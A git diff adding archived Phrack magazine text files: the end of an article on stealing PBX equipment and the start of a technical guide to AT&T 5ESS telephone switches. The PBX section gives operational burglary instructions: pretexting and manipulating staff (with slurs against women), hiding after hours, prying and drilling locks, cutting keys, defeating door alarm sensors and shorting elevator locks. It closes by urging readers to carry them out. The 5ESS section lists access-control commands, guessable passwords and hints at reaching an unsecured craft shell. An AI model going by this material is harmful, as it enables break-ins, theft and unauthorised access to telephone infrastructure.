+roughly a foot long, with rows of metallic pins that the wiring is
+punched into with a special tool.  As a general rule, if the system is
+fastened to the wall and doesn't have at least one muffin fan built-in
+and running, it's either a measly key system or a PBX too small to
+deserve your attention.  Those worthy of your time will stand alone as a
+cabinet with a hinged door, contain shelves of circuit cards, and
+emanate the harmonious hum of cooling fans.  As an example, Mitel PBXs
+commonly fit cozily in closets -- sometimes even one of the newer ROLMs
+or a voice mail system.  On the other hand, an NT SL-100 should
+not be an expected closet find.
+     Wandering through office buildings in search of phone closets
+during business hours is easy, so long as you dress and act the part.
+You'll also want to look confident that you know what you're doing and
+where you're going.  Remember, these buildings are open to the public
+and an employee of one company can't tell whether or not you're a client
+of another.  When going in and out of the phone closets, who's to know
+you're not a technician or maintenance man?
+     Apart from searching the closets, you can approach the secretaries.
+Feign being lost and ask to use the telephone.  Steal a glance at the
+console and you'll know (with a little practice) what type of PBX
+they've got.  This is very valuable information, for it may save you
+from unsuccessfully breaking into the closet (should it be locked) or
+the company itself.  Secretaries are cute, courteous, and dumb.  You
+shouldn't have a problem convincing her to give you the key to the phone
+closet if you're posing as a technician.  If you're feeling as confident
+as you should be, you may even get a date with the bitch.  And should
+you ever raise suspicion, you always have the option of bailing out and
+making a break for the stairwell.  No business exec is going to chase
+you down.
+     Some additional methods can be employed in conjunction with
+visiting the buildings, or as a precursor to such :
+
+-- Classified ads.  A company with job openings is all the more
+vulnerable to your dark motives.  Using the help-wanted section of your
+newspaper, look for receptionist and secretarial positions.  Call and
+ask, "What type of phone system will I be required to handle?"  You may
+also want to go in and apply for the job -- any job at a large firm will
+do.  You'll learn the type of system installed, some details about
+security, etc; this is a very sophisticated way of "casin' the joint."
+
+-- Scanning for RMATS.  Using your preferred wardialer (such as
+ToneLoc), scan business districts for PBX remote maintenance modems then
+CNA your finds.
+
+-- Targeting interconnects.  Interconnects are PBX dealers that sell,
+install, and maintain the systems on contract.  Capture a database of
+clients and you'll have a windfall of leads and pertinent info.  AT&T
+allegedly sells its database by region.  Also, intercept voice mail or
+company e-mail.  Interconnects make decent targets themselves.
+
+-- Users groups and newsletters.  Some of the extremely large PBX owners
+join users groups.  Though this is abstract, owners will discuss their
+systems openly at the meetings.  Newsletters are mailed out to members,
+often discussing special applications of specific locations in detail.
+Great for making sales contacts.
+
+Phase II : Extraction
+
+     Removing the PBX calls for an assessment of obstacles versus
+available means and methods.  The optimum plan incorporates a late
+afternoon entry with a nighttime departure.  This means entering the
+building during business hours and hiding, either in the PBX closet
+itself or any room or empty space where you can wait until after hours
+to re-emerge.  This is the most safest and effective of methods.  You
+need not worry about alarms or breaking in from outside, and you can
+take advantage of one of the greatest weaknesses in corporate office
+security -- janitors.  The janitorial staff, if you act and dress
+properly, will allow you to walk right into an office while they're
+cleaning.  If you're already in an office and they enter, just act like
+you own the place and it'll be assumed you work there.  If you prefer
+not to be seen, keep hidden until the cleaning is done on your floor.
+(Be sure not to make the idiotic mistake of hiding in the janitor's
+closet).  Although the custodians will lock the doors behind them, any
+alarms in the building will remain off until cleaning for the entire
+structure is complete.
+     There is simply nothing so elegant as entering the building during
+the daytime hours, hiding, and re-emerging to wreak havoc when
+everyone's gone.  (A patient wait is required -- take along a Phrack to
+read).  Unfortunately, entry will not always be so easy.  The phone
+closet may have a dead-bolt lock.  There may be no feasible hiding
+place.  People may constantly be working late.  Because of all the
+potential variables, you should acquire a repertoire of means and
+methods.  Use of these methods, though easy to learn, is not so quickly
+mastered.  There is a certain "fluidity of technique" gained only
+through experience.  Deciding which to use for a given situation will
+eventually come naturally.
+
+-- Use of tools.  You can easily get around almost any office building
+using only screwdrivers.  With practice, prying doors will be quick and
+silent.  Although some doors have pry-guards or dead-bolts, about every
+other phone closet you'll encounter can be opened with a screwdriver.
+Before forcing the gap between door and frame, try sliding back the
+locking mechanism.  For best results, work it both ways with a pair of
+screwdrivers; a short one for leverage, a longer one for manipulation.
+     For dead-bolts, a pipe wrench (a wrench with parallel grips) can
+turn the entire lock 90 degrees.  Interior doors are cheaply
+constructed; if you can wrench the lock, it'll turn and the bolt will be
+pulled back into the door.  Quality dead-bolts have an inclined exterior
+to prevent it from being gripped.  For these, diamond-cutting string can
+be applied.  This is available at select plumbing supply houses for $150
+upwards.
+
+-- Ceilings and adjacent offices.  Not only are the doors cheap inside
+office buildings, so are the walls.  If you're having trouble with a
+door or lock, push up a ceiling tile with your screwdriver and see if
+the wall stops or is continuous.  If it stops, you may choose to climb
+over.  If you're already inside an office and find a particular room
+locked, climbing is always an option because walls are never continuous
+between rooms.  Walls are seldom continuous between business either; if
+you can't get into a particular office space, try through adjacent
+space.
+
+-- Brute force.  If making noise is not a serious concern, a crowbar
+will pry any door open.  For most situations requiring this level of
+force, a sleek, miniature bar is all you need.  You can also saw or
+hammer your way through any interior wall.  Once you've made a hole in
+the sheetrock, you can practically break out the remainder of an opening
+yourself using only your hands.
+     From the outside, windows can be broken or removed.  Office
+building glass is installed from the outside, so by removing the seal
+and applying a suction device, you can pull the entire window out.
+Breaking the glass is not too difficult, but frighteningly loud.  Using
+a screwdriver, push the blade between the edge and its frame and pry.
+Eventually you'll have holes and cracks running across the window.
+Building glass is typically double-paned; once through the exterior
+layer, you'll have to break the next.  Because the second layer isn't as
+thick, you have the option of prying or smashing.  This sounds extremely
+primitive -- it is, but it may be the only method available to you.
+Highly-alarmed office structures do not have the windows wired.  When
+there's a 5,000-port NEC NEAX 2400 in view and alarms everywhere else,
+you'll break the fucking glass.
+
+-- Alarm manipulation.  Entire files could be written on this subject.
+Some relevant facts will be touched on here; no MacGyver shit.
+     Our "typical" office building, if alarmed, has one of three types
+of alarm plans.  The alarm system is either externally-oriented,
+internally-oriented, or both.  More often than not, externally-oriented
+alarm systems are encountered.  These focus on keeping outside intruders
+from entering the building -- interior offices are secured only by
+locks.  Alarm devices such as magnetic switches and motion detectors are
+in place solely in lobby areas and on doors leading from outside.  If
+you know in advance that you can readily enter any of the offices, the
+alarm is harmless.  After entering, go directly into the office and look
+out the window.  Eventually, security or police will arrive, look
+around, then reset the alarm and leave -- so long as you haven't left
+any trace of your entry (damaged doors, ceiling tile fragments, etc).
+Although common areas and corridors will be briefly scanned, no company
+offices will be entered.
+     Internally-oriented alarm plans include alarms on individual
+offices and are more difficult to reckon with.  However, the sensors are
+only on the doors; any method that avoids opening the door can still be
+used.
+     Access controls like cardkeys are impressive in appearance but do
+not automatically represent an alarm.  If you open the door without
+inserting a cardkey, the system must be equipped to know whether a
+person entered the building or exited.  Thus, only those systems with
+motion detectors or a "push button to exit" sign and button can cause an
+alarm at the cardkey-controlled door.  Otherwise the door and cardkey
+device is no more than a door with an electronic lock.  There are always
+exceptions to the rules, of course; never trust any alarm or access
+control system.  Sometimes a system will be programed to assume any
+opened door is someone entering, not exiting.  Check for sensors --
+mounted flush on the door frame -- look carefully, they'll sometimes be
+painted over.  Check both sides and top of the frame.  If a sensor is
+found (or when in doubt) hold the door open for about ten seconds, then
+wait and watch for up to an hour to see if there's a silent alarm.
+     For the "push button to exit" entrances, you can sometimes use a
+coat hanger or electricians fish tape to push the button from outside
+using cracks around the door.  Where motion detectors automatically open
+the entrance, similar devices can be employed to create enough commotion
+to activate the detector (depending on detector type).
+     Disabling part of the alarm system may be a possibility during the
+day.  Chances are, if you can access the control CPU you've also got a
+place to hide, and the control box is often alarmed against tampering
+anyway.  Many of the latest systems are continuously monitored from a
+central station.  If not, you can disconnect the alarm box from its
+phone line.  Your best approach however is to alter a door
+sensor/magnetic switch circuit.  You can use a piece of conductive hot
+water duct tape to trick the sensor into thinking the door is always
+closed.  This tape looks like tin foil with an adhesive on one side.
+Obtain a similar sensor and test at home before relying on this --
+magnetic switches come in many shapes and forms.  The better systems
+don't even check for normally-open or normally-closed states, but for
+changes in the loop's resistance.  This means simply cutting or
+shorting the lead wires won't suffice.  But if the conductive tape won't
+do, you can always just cut the leads and return in a couple days.  If
+the cut hasn't been repaired, then you have an entry point.  Building
+managers become lax with an alarm system after it's been installed for a
+while and there haven't been any break-ins.  Other loops are disabled
+after late-working employees repeatedly off the alarm.  One other option
+is to cut and splice both parts of the sensor back into the loop so that
+it remains unaffected by movement of the door.  The throughways to
+target for any of these alterations are minor side doors such as parking
+garage or stairwell exits.  You should be pleasantly surprised with the
+results.
+
+-- Locks and picks.  (This could be another textfile in itself).
+Lockpicking is an extremely useful skill for PBX appropriation but
+requires quite a bit of practice.  If you aren't willing to invest the
+time and patience necessary to become effective with this skill,
+screwdrivers are the next best thing.  Furthermore, with all the
+different types and brands of locks in existence, you'll never be able
+to solely rely on your lockpicking skills.  Acquire this ability if your
+involvement in underworld activities is more than just a brief stint...
+
+     You can more readily take advantage of the skills possessed by
+locksmiths.  Because the offices within a typical building all use the
+same brand lock with a common keying system, any of the locks can yield
+the pattern for a master key to the whole system.  Obtain a spare lock
+from the basement, maintenance room, or anywhere extra doors and
+hardware are stored, and take it to a locksmith.  Request a key for that
+lock and a master.  Many of the offices should now be open to you.
+     Some keys are labeled with numbers -- if the sequence on the key
+equals the number of pins in the lock, you can write down the number and
+lock brand, and get a duplicate of the key cut.
+     There is also a little locksmithing you can do on your own.  With a
+#3 triangular "rat tail" file and a key blank to the brand lock you are
+targeting, you can make your own key.  Blanks are either aluminum or
+brass and scratch easily -- this is no accident.  By inserting a key
+blank in the lock and moving it from side to side, you'll create
+slate-colored scratch lines on the blank from the lock's pins.  The
+lines will indicate where to begin filing a valley -- there'll be one
+for each pin.  Move the file back and forth a few times and re-insert
+the key to make new lines.  Use the point of the file only when
+beginning the valley; successive passes should not create a point at the
+bottom of the cut but leave a flat gap.  When no new scratch appears on
+the bottom of a particular valley, don't file the valley any deeper --
+it's complete.  Eventually, all the valleys will be cut and you'll have
+a key to open the lock.
+     Last but certainly not least, you can drill most locks where a
+little noise can be afforded.  Using a 1/4 inch Milwaukee cordless drill
+with about a 1/8 inch carbide-tipped bit, you can drill a hole the
+length of the lock's cylinder.  Drill approximately 1/8 inch directly
+above the keyhole.  This destroys the lock's pins in its path, and
+allows others above to fall down into the hole.  Now the cylinder will
+turn with any small screwdriver placed in the keyhole and open the lock.
+Little practice is demanded of this technique, and it's a hell of a lot
+of fun.
+
+-- Elevator manipulation.  Elevators can be stubborn at times in
+rejecting your floor requests.  Companies that occupy entire floors must
+prevent an after-hours elevator from opening up on their unattended
+office.  If there's a small lock corresponding or next to that floor's
+selection button, unscrew the panel and short out the two electrical
+leads on the other end of the lock.  Continue to short the contacts
+until you press the button and it stays lit -- you'll then arrive at
+your desired floor.
+     The elevator motor and control room is located either on the roof
+or penthouse level and can be frequently found accessible.  Besides
+being a place to hide, sometimes you can find a bank of switches that
+override the elevator's control panel (if for some reason you can't open
+it or it's cardkey-controlled) and get to your floor that way.  Two
+people with radios are needed to do this -- one in the equipment room,
+one in the elevator.  Watch for high voltage and getting your coat
+caught in a drive belt ...
+
+Operation Integrity
+
+     By taking advantage of daytime access, hiding places, and some of
+the more sophisticated methods, there's no need to become an alarm
+connoisseur or full-blown locksmith to liberate PBX equipment.  When
+you can't avoid nighttime activity or an activated alarm system, then be
+sure to take extra precautions.  Have lookouts, two-way radios, even a
+police scanner.  Don't use CB radios, but rather HAM transceivers or
+anything that operates on proprietary frequencies.  This will require a
+small investment, but there's no price on your safety.
+     Office buildings in downtown areas tend to be more secure than
+those in the suburbs or outlying areas.  Location and surroundings are
+important considerations when your operation takes place at night.  It
+should also be noted that a building without a security guard (typically
+the norm) may still subscribe to sporadic security checks where
+rent-a-cops drive around the building at some regular interval.
+     With regard to transportation and storage, rent vehicles and
+facilities in alias names where appropriate.  Use taxis to pick you up
+when you're departing with only a briefcase or single box of cards.  No
+matter what the time may be, anyone seeing you enter a taxi in front of
+the office will assume you're legit.
+     It is our sincere wish that you apply this information to the
+fullest extent in order to free yourself from becoming a mere tool of
+capitalism, and use this freedom to pursue those things in life that
+truly interest you.  We have tried to summarize and convey enough
+basic information here to provide you with a complete underground
+operation possibility.  All material in this file is based on actual
+experience of the authors and their associates.
+
+     For information on the sale of PBX or other telecommunications
+equipment, or for any other inquiry, contact the Dark Side Research
+group at the following Internet address :
+
+               codec@cypher.com
+
+***************************************************************************
\ No newline at end of file
diff --git a/phrack43/16.txt b/phrack43/16.txt
new file mode 100644
index 0000000..0f3af25
--- /dev/null
+++ b/phrack43/16.txt
@@ -0,0 +1,1562 @@
+                            ==Phrack Magazine==
+
+               Volume Four, Issue Forty-Three, File 16 of 27
+
+                   % % % % % % % % % % % % % % % % % % %
+                  % % % % % % % % % % % % % % % % % % % %
+                 % %                                   % %
+                  %            AT$T 5ESS(tm)            %
+                 % %        From Top to Bottom         % %
+                  %                                     %
+                 % %                                   % %
+                  %         by: Firm G.R.A.S.P.         %
+                 % %                                   % %
+                  % % % % % % % % % % % % % % % % % % % %
+                   % % % % % % % % % % % % % % % % % % %
+
+
+Introduction
+~~~~~~~~~~~~
+
+   Welcome to the world of the 5ESS.  In this file I will be covering
+the switch topology, hardware, software, and how to program the switch.  I
+am sure this file will make a few people pissed off <grin> over at BellCORE.
+   Anyways, the 5ESS switch is the best (I think) all around switch. Far
+better then an NT. NT has spent too much time with SONET and their S/DMS
+TransportNode OC48.  Not enough time with ISDN, like AT$T has done. Not only
+that, but DMS 100s are slow, slow, slow! Though I must hand it to NT, their
+DMS-1 is far better then AT$T's SLC-96.
+
+
+
+What is the 5ESS
+~~~~~~~~~~~~~~~~
+
+   The 5ESS is a switch. The first No. 5ESS in service was cut over in Seneca,
+Illinois (815) in the early 1982.  This test ran into a few problem, but all
+and all was a success.  The 5ESS is a digital switching system, this
+advantage was realized in No. 4 ESS in 1976.  The 5ESS network is a TST
+(Time Space Time) topology, the TSIs (Time Slot Interchangers) each
+have their own processor, this makes the 5ESS one of the faster switches.
+Though I hear some ATM switches are getting up there.
+
+
+
+
+5ESS System Architecture & Hardware
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+
+                    5ESS SYSTEM ARCHITECTURE
+
+                                               OSS Data Links
+
+                                                  ^ ^    ^
+                                                  | |    |
+                                                  | |    |
+                                            ......|.|....|......
+                                            :     v v    v     :
+                                            :   -------------  :
+                                            :   |           |  :
+                                            :   |   Input   |  :
+               ...........................  :   |   Output  |====== TTY/CRT
+-----------    :                         :  :   | Processor |  :
+| Switch  |<===========                  :  :   -------------  :
+| Module  |<========] |                  :  :           ^      ..............
+-----------    :    v v                  :  :          |                    :
+    o          :  =======   ----------   :  :          |       ------------ :
+    o          :  | TMS |<->|Message |   :  :          |       |  Main    | :
+    o          :  |     |<->|Switch  |<============    |       |  Store   | :
+-----------    :  =======   ----------   :  :     |    |       -----.------ :
+| Switch  |    :    ^ ^                  :  :     |    |            |       :
+| Module  |<========= |                  :  :     v    v            |       :
+-----------<===========                  :  :   --------------      |       :
+               :.........................:  :   |  3B        |=======       :
+                                            :   | Central    |              :
+                                            :   | Control    |<=====> Disk! :
+                                            :   --------------              :
+                                            :                               :
+                                            ................................:
+
+
+                 COMMUNICATIONS MODULE            ADMINISTRATIVE MODULE
+
+
+
+
+
+   The 5 ESS is a digital SPC switching system which utilizes distributed
+control, a TST switching network and modular hardware and software design.
+
+   The major components are:
+
+ADMINISTRATIVE MODULE
+
+    Two 3B20S Processors  (Which equal a 3B20D)
+
+    - Central control and main storage
+    - Disk storage for infrequently used programs and data, and main storage
+      regeneration.
+    - The two 3B20S processors are always comparing data, and when one fails
+      the other acts in its place.
+
+    Two Input/Output Processors (IOP)
+
+    - Provides TTY and data-link interfaces to the 3B20D Processor, 5ESS
+      Network, Master Control Center (MCC), and various Operational Support
+      Systems (OSS). Here is a list of the defult TTY (also called
+      "channels")
+
+
+          tty     Channel Name
+
+         ttyA     Master control console (MCC) terminal.
+         ttyB     Master control console (MCC) terminal.
+         ttyC     Traffic report printer
+         ttyJ     supplementary trunk and line work station (STLWS) terminals
+         ttyK     supplementary trunk and line work station (STLWS) terminals
+         ttyL     supplementary trunk and line work station (STLWS) terminals
+         ttyM     supplementary trunk and line work station (STLWS) terminals
+         ttyN     supplementary trunk and line work station (STLWS) terminals
+         ttyO     supplementary trunk and line work station (STLWS) terminals
+         ttyP     Repair service bureau - Recent change and verify (RSB-RCV)
+         ttyR     Office records printer
+         ttyQ     Switching control center-recent change and verify (SCC-RCV)
+                   terminals
+         ttyR     Repair service bureau-automatic line insulation testing
+                   (RSB-ALIT) terminal.
+         ttyS     Switching control center-recent change and verify (SCC-RCV)
+                   terminals
+         ttyT     Switching control center-recent change and verify (SCC-RCV)
+                   terminals
+         ttyU     Belt line B
+         ttyV     Local recent change and verify (RCV) terminal
+         ttyW     Remote recent change and verify (RCV) terminal.
+         ttyY     Network administration center (NAC) terminal.
+         ttyZ     The switching control center (SCC) terminal.
+         ttyi     SLC(R) carrier maintenance
+         ttyj     STLWS - fifth of six
+         ttyk     STLWS - sixth of six
+         ttyl     STLWS - first of six
+         ttym     STLWS - second of six
+         ttyn     STLWS - third of six
+         ttyo     STLWS - fourth of six
+         ttyp     RCV/Repair Service Bureau
+         ttyq     RCV/Network Administration Center
+         ttyr     ALIT/Repair Service Bureau
+         ttys     Maintenance
+         ttyt     Maintenance
+         ttyu     Belt line A
+         ttyv     Local RC/V
+         ttyw     Remote RC/V
+         ttyx     Maintenance Control Center/Switching Control Center System
+                  (MCC/SCCS)
+         ttyy     Maintenance Control Center/Switching Control Center System
+                  (MCC/SCCS)
+         ttyz     Maintenance Control Center/Switching Control Center System
+                  (MCC/SCCS)
+
+         FILE     Destination file name in /rclog partition
+
+         mt00     High-density tape device, rewind after I/O
+         mt04     High-density tape device, does not rewind after I/O
+         mt08     Low-density tape device, rewind after I/O
+         mt0c     Low-density tape device, does not rewind after I/O
+         mt18     Low-density tape device, rewind after I/O
+         mt1c     Low-density tape device, does not rewind after I/O
+         mttypc0  Special tape device, IOP 0, rewind after I/O
+         mttypc1  Special tape device, IOP 1, rewind after I/O.
+
+
+
+     Two Automatic Message Accounting (AMA) units
+
+     - Uses data links to transport calling information to central revenue
+       accounting office and AMA tape. Here is the basic structure AMA
+       structure for the OSPS model.
+
+         - Called customer's telephone number, either a
+            seven- or ten-digit number
+         - Calling customer's telephone number, seven digits
+         - Date
+         - Time of day
+         - Duration of conversation.
+
+
+
+
+COMMUNICATIONS MODULE
+
+    Message Switch (MSGS)
+
+    - Provides for control message transfer between the 3B20D Processor and
+      Interface Modules (IM's)
+    - Contains the clock for synchronizing the network.
+
+    Time Multiplexed Switch (TMS)
+
+    - Performs space division switching between SM's
+    - Provides permanent time slot paths between each SM and the MSGS
+      for control messages between the Processor and SM's (or between SM's)
+
+    Switching Module (SM)
+
+    - Terminates line and trunks
+    - Performs time division switching
+    - Contains a microprocessor which performs call processing function
+      for the SM
+
+
+
+                    5ESS - SWITCH MODULE
+
+                                          --------------
+                                          |            |
+                                          |   SMPU     |
+                                          |------------|
+                       ---------          |            |
+                       |       |   (64)   |            |
+Analog Sub Lines <---->|  LU   |<-------->|            |
+                       |-------|          |            |
+                       |       |   (64)   |            |
+Analog Trunk Lines <-->|  TU   |<-------->|            |   (256)
+                       |-------|          |    TSIU    |<--------> NCT
+                       |       |          |            |           Links
+                       |       |   (128)  |     512    |           to
+SLC-96 Remote <------->| DCLU  |<-------->|    Time    |<--------> TMS
+                       |       |          |    Slots   |
+                       |-------|          |            |
+                       |       |          |            |
+                       |       |          |            |
+                       |       |          |            |
+                       |       |   (256)  |            |
+T1 Lines   <---------->| DLTU  |<-------->|            |
+                       |       |          |            |
+                       |       |          |            |
+                       |       |          |------------|
+                       ---------          |            |
+                                          |    DSU     |
+                                          --------------
+
+
+
+COMMON COMPONENTS OF THE SWITCH MODULE (SM)
+
+    Switch Module Processor Unit (SMPU)
+
+    - Contains microprocessors which perform many of the call processing
+      functions for trunks and links terminated on the SM.
+
+    Time Slot Interchange Unit (TSIU)
+
+    - 512 time slot capacity
+    - Connects to the TMS over two 256-time slot Network Control and Timing
+      (NCT) links.
+    - Switches time slots from Interface Units to one of the NCT links (for
+      intermodule calls).
+    - Switches time slots from one Interface Unit to another within the SM
+      (for intramodule calls).
+
+    Digital Service Unit (DSU)
+
+    - Local DSU provides high usage service circuits, such as tone decoders
+      and generators, for lines and trunks terminated on the SM.
+    - Global DSU provides low usage service circuits, such as 3-port
+      conference circuits and the Transmission Test Facility, for all lines
+      and trunks in the office (requires 64 time slots).
+
+    The SM may be equipped with four types of Interface Units:
+
+    Line Unit (LU)
+
+    - For terminating analog lines.
+    - Contains a solid-state two-stage analog concentrator that provides
+      access to 64 output channels. The concentrator can be fully equipped to
+      provide 8:1 concentration or can be fully equipped to provide 6:1 or 4:1
+      concentration.
+    - Each TU requires 64 time slots.
+
+    Trunk Unit (TU)
+
+    - For terminating analog trunks.
+    - Each TU requires 64 time slots.
+
+    Digital Line Trunk Unit (DLTU)
+
+    - For terminating digital trunks and RSM's.
+    - Each fully equipped DLTU requires 256 time slots.
+    - A maximum of 10 DSls maybe terminated on one DLTU.
+
+   The SM may be equipped with any combination of LU's, TU's, DCLU's and DLTU's
+totaling 512 time slots.
+
+
+5ESS System Software
+~~~~~~~~~~~~~~~~~~~~
+
+   The 5ESS is a UNIX based switch. UNIX has played a large part in
+switching systems since 1973 when UNIX was use in the Switching Control Center
+System (SCCS).  The first SCCS was a 16 bit microcomputer. The use of
+UNIX for SCCS allowed development in C code, pseudo code, load test,
+structure and thought. This led the development of the other switching systems
+which AT$T produces today (such at System 75, 85, 1AESS AP, and 5ESS).
+NOTE: You may hear SCCS called the "mini" sometimes
+   The 5ESS's /etc/getty is not set up for the normal login that one would
+expect to see on a UNIX System. This is due to the different channels that
+the 5ESS has. The some channels are the TEST Channel, Maintenance Channel,
+and RC Channel (which will be the point of focus). Once you are on one
+channel you can not change the channel, as someone has said " it is
+not a TV!" You are physically on the channel you are on.
+
+
+Test Channel
+~~~~~~~~~~~~
+
+   The TEST channel is where one can test lines, and test the switch itself.
+This is where operating support systems (such as LMOS) operate from.
+This channel allows one to monitor lines via the number test trunk aka
+adding a third trunk), voltage test and line seizure.
+Here is a list of OSSs which access the test channels on the 5ESS.
+
+
+ Group                    Operating Support Systems
+
+ Special Service Center
+                          SMAS via NO-Test
+                          SARTS (IPS)
+                          NO-TEST trunk (from the switch)
+                          TIRKS
+                          17B and 17E test boards (CCSA net using X-Bar)
+                          RTS
+                          BLV
+                          POVT
+                          DTAC
+                          etc...
+
+ Repair Service Bureau
+                          #16LTD
+                          #14LTD
+                          LMOS (IPS)
+                          MLT-2
+                          ADTS
+                          TIRKS
+                          TFTP
+                          TRCO
+                          DAMT
+                          ATICS
+                          etc...
+
+
+SCC Channel
+~~~~~~~~~~~
+
+   The SCC channel is where the SCC looks and watches the switch 24 hours a day,
+seven days a week! From this channel one can input RC messages if necessary.
+A lot of people have scanned these out, and though they were AMATs.  Well this
+is in short, WRONG! Here is a sample buffering of what they are finding.
+
+-----------------------------------------------------------------------------
+
+   S570-67 92-12-21 16:16:48 086901 MDIIMON BOZOVILL DS0
+A  REPT MDII WSN  SIGTYPE DP            TKGMN 779-16    SZ 21   OOS 0
+     SUPRVSN RB  TIME 22:16:48  TEN=14-0-1-3-1  TRIAL 1 CARRFLAG NC     ID
+     OGT  NORMAL  CALL  CALLED-NO       CALLING-NO      DISCARD 0
+
+   S4C0-148963487 92-12-21 16:17:03 086902 MAIPR BOZOVILL DS0
+   OP:CFGSTAT,SM=1&&192,OOS,NOPRINT; PF
+
+   S570-67 92-12-21 16:17:13 086903 S0 BOZOVILL DS0
+M  OP CFGSTAT SM 5 FIRST RECORD
+     UNIT                       MTCE STATE       ACTIVITY  HDWCHK  DGN RESULT
+     LUCHAN=5-0-0-3-4           OOS,AUTO,FE      BUSY      INH        CATP
+     LUCHAN=5-0-0-2-5           OOS,AUTO,FE      BUSY      INH        ATP
+     LUCHAN=5-0-0-0-3           OOS,AUTO,FE      BUSY      INH        ATP
+     LUCHAN=5-0-0-3-5           OOS,AUTO,FE      BUSY      INH        ATP
+     LUHLSC=5-0-0-1             OOS,AUTO,FE      BUSY      INH        ATP
+     LUCHAN=5-0-0-0-2           OOS,AUTO,FE      BUSY      INH        CATP
+     LUCHAN=5-0-0-3-6           OOS,AUTO,FE      BUSY      INH        ATP
+     LUCHAN=5-0-0-1-4           OOS,AUTO,FE      BUSY      INH        ATP
+
+
+   S570-983110 92-12-21 17:09:53 144471 TRCE WCDS0
+A  TRC IPCT EVENT 2991
+     DN 6102330000  DIALED    DN 6102220001
+     TIME 17:09:52
+
+
+------------------------------------------------------------------------------
+
+  This has nothing to do with AMA, this is switch output on say the SCC
+channel.  This is used by the SCCS for logging, and monitoring of alarms.
+The whole point of this channel is to make sure the switch is doing what it
+should do, and to log all activity on the switch. NOTHING MORE!
+   To go into these messages and say what they are would take far too long,
+order the OM manuals for the 5ESS, watch out, they are about 5 times the size of
+the IM (input manual) set.  On average it takes someone three years of training
+to be able to understand all this stuff, there is no way anyone can write a
+little file in Phrack and hope all who read it understand everything about the
+5ESS. RTFM!
+
+
+RC Channel
+~~~~~~~~~~
+
+   The RC/V (Recent Change/Verify) Channel is where new features can be added or taken
+away from phone lines. This is the main channel you may come in contact with,
+if you come in contact with any at all. When one connects to a 5ESS RC/V channel
+one may be dumped to a CRAFT
+shell if the login has not been activated.  Access to the switch when the
+login is active is controlled by lognames and passwords to restrict
+unwanted entry to the system.  In addition, the SCC (Switching Control
+Center) sets permission modes in the 5ESS switch which control the RC
+(recent change) security function.
+   The RC security function determines whether recent changes may be made
+and what types of changes are allowed.  If a situation arises where the RC
+security function denies the user access to recent change via RMAS or RC
+channels, the SCC must be contacted so that the permission modes can be
+modified.  (Hint Hint)
+   The RC security function enables the operating telephone company
+to decide which of its terminals are to be allowed access to which
+set of RC abilities.  NOTE that all verify input messages are always
+allowed and cannot be restricted, which does not help too much.
+     The RC security data is not part of the ODD (office dependent data).
+Instead, the RC security data is stored in relatively safe DMERT operating
+system files which are only modifiable using the following message:
+
+SET:RCACCESS,TTY="aaaaa",ACCESS=H'bbbbb;
+
+where: aaaaa = Symbolic name of terminal in double quotes
+          H' = Hexadecimal number indicator in MML
+       bbbbb = 5-character hexadecimal field in 5E4 constructed
+               from binary bits corresponding to RC ability.
+               The field range in hexadecimal is from 00000 to
+               FFFFF.
+
+     This message must be entered for each type terminal (i.e.
+               "aaaaa"="rmas1", "rmas2", etc., as noted above in
+                TTY explanations).
+
+
+NOTE: Order IM-5D000-01 (5ESS input manual) or OM-5D000-01 (5ESS output manual)
+for more information on this and other messages from the CIC at 1-800-432-6600.
+You have the money, they have the manuals, do not ask, just order.  I
+think they take AMEX!
+
+     When the message is typed in, a DMERT operating system file is created
+for a particular terminal.  The content of these files, one for each terminal,
+is a binary field with each bit position representing a unique set of RC
+abilities.  Conversion of this hexadecimal field to binary is accomplished
+by converting each hexadecimal character to its equivalent
+4-bit binary string.
+
+       ----------------------------------------------------------
+       HEX   BINARY | HEX   BINARY | HEX   BINARY | HEX   BINARY
+       -------------|--------------|--------------|--------------
+        0     0000  |  4     0100  |  8     1000  |  C     1100
+       -------------|--------------|--------------|--------------
+        1     0001  |  5     0101  |  9     1001  |  D     1101
+       -------------|--------------|--------------|--------------
+        2     0010  |  6     0110  |  A     1010  |  E     1110
+       -------------|--------------|--------------|--------------
+        3     0011  |  7     0111  |  B     1011  |  F     1111
+       ----------------------------------------------------------
+
+
+Each bit position corresponds to a recent change functional area.
+  A hexadecimal value of FFFFF indicates that all bit positions are
+set to 1 indicating that a particular terminal has total RC access.  Also,
+verify operations as well as lettered classes are not included in the
+terminals security scheme since all terminals have access to verify views
+and lettered classes.
+  In addition, maintenance personnel are able to verify the security
+code for any terminal by typing the following message from either
+the MCC (Master Control Center) or SCCS (Switching Control Center System)
+Mini terminal:
+
+OP:RCACCESS,TTY="xxxxx";
+
+where: xxxxx = symbolic name of terminal in double quotes.
+
+Each bit position corresponds to a recent change functional area.
+
+  To ensure redundancy, DMERT operating system files are backed up
+immediately on disk by the SCC.
+  The input message that defines the password and CLERK-ID (another name for
+username) is in the Global RC feature.  This input message defines a clerk-id
+and associated password or deletes an existing one. (Recall that CLERK-ID and
+PASSWORD are required fields on the Global RC Schedule view 28.1 in
+RCV:MENU:APPRC, but more on this later)
+
+This new input message is as follows:
+
+GRC:PASSWORD,CLERKID=xxxxxxxxxx,[PASSWD=xxxxxxxx|DELETE]
+
+Note: CLERKID  can be from 1 to 10 alphanumeric characters and
+      PASSWORD from 1 to 8 alphanumeric characters.
+
+This input message can only be executed from the MCC or SCCS
+terminals, and only one password is allowed per CLERK-ID.  To
+change a clerk-id's password, this message is used with the same
+CLERK-ID but with a different password.
+
+
+
+Global RC Schedule View 28.1 from the RC/V Recent Change Menu System
+----------------------------------------------------------------------------
+
+
+                          5ESS SWITCH  WCDS0
+                          RECENT CHANGE  28.1
+                   GLOBAL RECENT CHANGE SCHEDULING
+
+*1. GRC NAME   __________
+*2. SECTION    _____
+#3. CLERK ID   __________
+#4. PASSWORD   ________
+ 5. MODE       _______
+ 6. RDATE      ______
+ 7. RTIME      ____
+ 8. SPLIT      _
+ 9. SPLIT SIZE _____
+10. MAX ERRORS _____
+11. VERBOSE    _
+
+
+
+----------------------------------------------------------------------------
+
+When the security is set up on the RC/V channel, one will see:
+
+
+----------------------------------------------------------------------------
+
+5ESS login
+
+15       WCDS0                    5E6(1)                   ttsn-cdN TTYW
+
+Account name:
+
+
+----------------------------------------------------------------------------
+
+There are no defaults, since the CLERK-ID and the password are set by craft,
+but common password would be the name of the town, CLLI, MANAGER, SYSTEM,
+5ESS, SCCS1, SCC, RCMAC, RCMAxx, etc,...
+      If one sees just a " < "  prompt you are at the 'craft' shell
+of the RC/V channel, the 5E login has not been set. The Craft shell is
